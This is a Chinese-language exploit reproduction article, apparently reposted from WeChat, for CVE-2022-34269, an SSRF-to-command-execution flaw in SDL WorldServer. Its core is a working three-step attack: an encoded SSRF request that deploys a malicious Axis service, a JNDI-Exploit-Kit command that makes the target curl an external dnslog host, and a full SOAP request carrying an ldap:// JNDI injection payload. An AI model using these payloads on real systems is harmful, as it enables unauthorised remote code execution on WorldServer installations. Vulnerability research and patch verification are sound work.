[漏洞复现] CVE-2022-34269 SDL WroldServer SSRF
2023-12-27 08:31:22 Author: 不够安全(查看原文) 阅读量:16 收藏

本人非原创漏洞作者,文章仅作为知识分享用

一切直接或间接由于本文所造成的后果与本人无关

如有侵权,联系删除

产品简介

SDL WorldServer 翻译流程管理系统专为本地化项目经理及其团队而设计,用于集中管理、自动化和控制大量的翻译项目,以提供按时、按预算的高质量翻译交付。企业团队可在整个组织内重新获得翻译控制权,并可与多个外部翻译供应商(LSP)高效协作。目前支持许多全球知名品牌的翻译流程,成功简化并加快了其内容从网站到文档到软件的本地化流程。

开发语言:Java官网地址:https://www.rws.com/cn/

空间测绘

回复“CVE-2022-34269”获取空间测绘语句

漏洞描述

在 11.7.3 之前的 RWS WorldServer 中发现了一个问题。经过身份验证的远程攻击者可以执行 ws-legacy/load_dtd?system_id= 进行盲SSRF 攻击,将 JSP 代码部署到在 localhost 接口上运行的 Apache Axis 服务,从而导致命令执行。

影响版本

SDL WorldServer ≤ 11.7.2.243

漏洞利用

1.创建新的服务

/ws-legacy/load_dtd?system_id=http%3a//127.0.0.1%3a8080/ws-legacy/services/AdminService%3fmethod%3d!--%253E%253Cdeployment%2520xmlns%253D%2522http%253A%252F%252Fxml.apache.org%252Faxis%252Fwsdd%252F%2522%2520xmlns%253Ajava%253D%2522http%253A%252F%252Fxml.apache.org%252Faxis%252Fwsdd%252Fproviders%252Fjava%2522%253E%253Cservice%2520name%253D%2522ServiceFactoryService%2522%2520provider%253D%2522java%253ARPC%2522%253E%253Cparameter%2520name%253D%2522className%2522%2520value%253D%2522org.apache.axis.client.ServiceFactory%2522%252F%253E%253Cparameter%2520name%253D%2522allowedMethods%2522%2520value%253D%2522*%2522%252F%253E%253C%252Fservice%253E%253C%252Fdeployment&token=02

2.启动LDAP服务

java -jar JNDI-Exploit-Kit-1.0-SNAPSHOT-all.jar -C 'curl 8e2wrm.dnslog.cn'

3.在Burp中发送请求

POST /ws-legacy/services/UserWSUserManager HTTP/1.1Host: localhost:8080Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5763.212 Safari/537.36 OPR/98.0.4728.119Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: JSESSIONID=A440950C0CE03EBC83A30F926F0FC3E3Connection: closeSOAPAction:Content-Type: text/xml;charset=UTF-8Content-Length: 856
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:com="http://www.idiominc.org/com.idiominc.webservices.UserWSUserManager"> <soapenv:Header/> <soapenv:Body> <cli:getService soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <environment xsi:type="x-:Map" xs:type="type:Map" xmlns:x-="http://xml.apache.org/xml-soap" xmlns:xs="http://www.w3.org/2001/XMLSchema-instance"> <item xsi:type="x-:mapItem" xs:type="type:mapItem"> <key xsi:type="xsd:string">jndiName</key> <value xsi:type="xsd:string">ldap://10.0.0.131:1389/ipgtz4</value> </item> </environment> </cli> </soapenv:Body></soapenv:Envelope>

参考链接

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34269https://www.triskelelabs.com/vulnerabilities-in-rws-worldserver

回复“CVE-2022-34269”获取空间测绘语句


文章来源: http://mp.weixin.qq.com/s?__biz=Mzg2OTYzNTExNQ==&mid=2247484668&idx=3&sn=431b7eda0a2548f4231551d38dafa578&chksm=cf02d92555697ce8af91006ebde042258562d721203134e0bf632d5c5c4b956ef4f8d9230af1&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh